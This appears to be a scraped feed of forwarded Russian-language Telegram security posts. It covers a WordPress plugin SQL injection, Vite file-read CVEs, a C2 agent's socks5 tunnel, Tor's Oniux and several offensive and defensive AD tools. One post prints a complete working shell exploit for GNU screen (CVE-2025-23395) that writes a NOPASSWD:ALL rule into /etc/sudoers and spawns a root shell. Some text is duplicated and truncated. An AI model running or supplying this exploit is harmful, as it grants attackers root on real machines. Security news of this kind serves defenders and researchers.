Forwarded from GISCYBERTEAM
⚠️ SQL-инъекция в WordPress плагине Slider & Popup Builder by Depicter
Обнаружена SQL-инъекция в популярном WordPress-плагине Slider & Popup Builder by Depicter, установленном на более чем 100 000 сайтов.
📈 CVSS рейтинг: 7.5 (High)
📍 Уязвимый компонент:
🧨 Возможности атакующего:
- Инъекция произвольных SQL-запросов
- Извлечение всех хэшей паролей (
- Потенциальный офлайн брутфорс
- Извлечение данных без аутентификации
🔬 Proof-of-Concept уже находится в открытом доступе.
Обнаружена SQL-инъекция в популярном WordPress-плагине Slider & Popup Builder by Depicter, установленном на более чем 100 000 сайтов.
📈 CVSS рейтинг: 7.5 (High)
📍 Уязвимый компонент:
/wp-admin/admin-ajax.php — параметр s в одном из обработчиков AJAX-запросов.🧨 Возможности атакующего:
- Инъекция произвольных SQL-запросов
- Извлечение всех хэшей паролей (
user_pass из wp_users)- Потенциальный офлайн брутфорс
- Извлечение данных без аутентификации
🔬 Proof-of-Concept уже находится в открытом доступе.
GitHub
GitHub - datagoboom/CVE-2025-2011: PoC for CVE-2025-2011 - SQLi in Depicter plugin <= 3.6.1
PoC for CVE-2025-2011 - SQLi in Depicter plugin <= 3.6.1 - datagoboom/CVE-2025-2011
Forwarded from SecuriXy.kz
💥 Тот случай, когда взяли одну уязвимость -
CVE-2025-30208 (📂 Vitejs File Read) и докрутили до следующей: CVE-2025-31125
📦 Обе позволяют обойти защиту @fs и читать файлы вне разрешённого списка.
🧵 Разные методы - один результат: произвольное чтение файлов через URL-параметры.
💡 PoC: github.com/MuhammadWaseem29/Vitejs-exploit
🔐 Обновите Vite, если ваш dev-сервер доступен из сети.
CVE-2025-30208 (📂 Vitejs File Read) и докрутили до следующей: CVE-2025-31125
📦 Обе позволяют обойти защиту @fs и читать файлы вне разрешённого списка.
🧵 Разные методы - один результат: произвольное чтение файлов через URL-параметры.
💡 PoC: github.com/MuhammadWaseem29/Vitejs-exploit
🔐 Обновите Vite, если ваш dev-сервер доступен из сети.
Forwarded from Кибер ПТУ | Кибербезопасность
2025 attacks playbook.pdf
882.1 KB
Смотрим, как нас будут атаковать
Держите плейбук, а точнее сшитые вместе кучу плейбуков с векторами атак по абсолютно разным направлениям уибербеза и IT: от цепочек поставок и дипфейков до зеродеев и IoT-а.
В общем, сюда запихнули почти все известные вам ИБшные термины.
#BaseSecurity
🧠 Твой Пакет Знаний | 👨🏫 Менторство ИБ
📂 Другие каналы
Держите плейбук, а точнее сшитые вместе кучу плейбуков с векторами атак по абсолютно разным направлениям уибербеза и IT: от цепочек поставок и дипфейков до зеродеев и IoT-а.
В общем, сюда запихнули почти все известные вам ИБшные термины.
#BaseSecurity
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Adaptix Framework
С версии 0.5 агент gopher будет также работать и в Windows системах...
Еще в данном агенте появится socks5 прокси... А так как агент синхронный, то для каждого канала поднимаются свой поток и отдельное соединение с сервером C2. Туннель способен выдерживать даже многопоточные сканеры)
Еще в данном агенте появится socks5 прокси... А так как агент синхронный, то для каждого канала поднимаются свой поток и отдельное соединение с сервером C2. Туннель способен выдерживать даже многопоточные сканеры)
www.opennet.ru
Проект Tor представил Oniux, утилиту для сетевой изоляции приложений
Разработчики проекта Tor представили утилиту Oniux, предназначенную для принудительного направления трафика отдельных приложений через сеть Tor. По своему назначению Oniux напоминает ранее доступную программу torsocks и отличается использованием для изоляции…
🔗Ссылка:
https://opennet.ru/63237/
https://opennet.ru/63237/
Forwarded from AP Security
#soc
FalconHound
С момента своего выхода в 2016 году BloodHound стал основным инструментом для специалистов по наступательной безопасности, позволяющим выявлять неправильные конфигурации в Active Directory.
Основная цель FalconHound - обеспечить использование всех различных событий в системе и обновление базы данных BloodHound для улучшения качества работы синих команд при его использовании
FalconHound
С момента своего выхода в 2016 году BloodHound стал основным инструментом для специалистов по наступательной безопасности, позволяющим выявлять неправильные конфигурации в Active Directory.
Основная цель FalconHound - обеспечить использование всех различных событий в системе и обновление базы данных BloodHound для улучшения качества работы синих команд при его использовании
GitHub
GitHub - FalconForceTeam/FalconHound: FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of…
FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log ag...
👍1
Forwarded from 1N73LL1G3NC3
CVE-2025-23395 Screen LPE exploit
Blog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395
#!/bin/sh
F=$(mktemp)
L=${HOME}/screen.log
T=/etc/sudoers
rm -rf $F $L
mkfifo $F
O=$(stat --printf="%s" $T)
echo "[+] spawning GNU screen"
screen -L -Logfile $L -dmS hax sh -c "cat $F"
while [ ! -f $L ]; do sleep 0.1; done
echo "[+] logfile appeared, doing hax"
rm $L
ln -s $T $L
P="${USER} ALL=(ALL) NOPASSWD:ALL"
(echo $P; for i in `seq 8192`; do echo; done) > $F
if [ $(stat --printf="%s" $T) -gt $O ] ; then
echo "[+] bl1ng bl1ng, we got it"
sudo sh
else
echo "[-] exploit failed :("
fi
rm -rf $F $L
Blog: https://security.opensuse.org/2025/05/12/screen-security-issues.html#3a-local-root-exploit-via-logfile_reopen-cve-2025-23395
👍1
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Несколько часов назад была сильно обновлена утилита certipy. Обратим внимание, что в документации также появилось описание техники ESC16...
#redteam #pentest #ad #adcs
#redteam #pentest #ad #adcs
GitHub
GitHub - ly4k/Certipy: Tool for Active Directory Certificate Services enumeration and abuse
Tool for Active Directory Certificate Services enumeration and abuse - ly4k/Certipy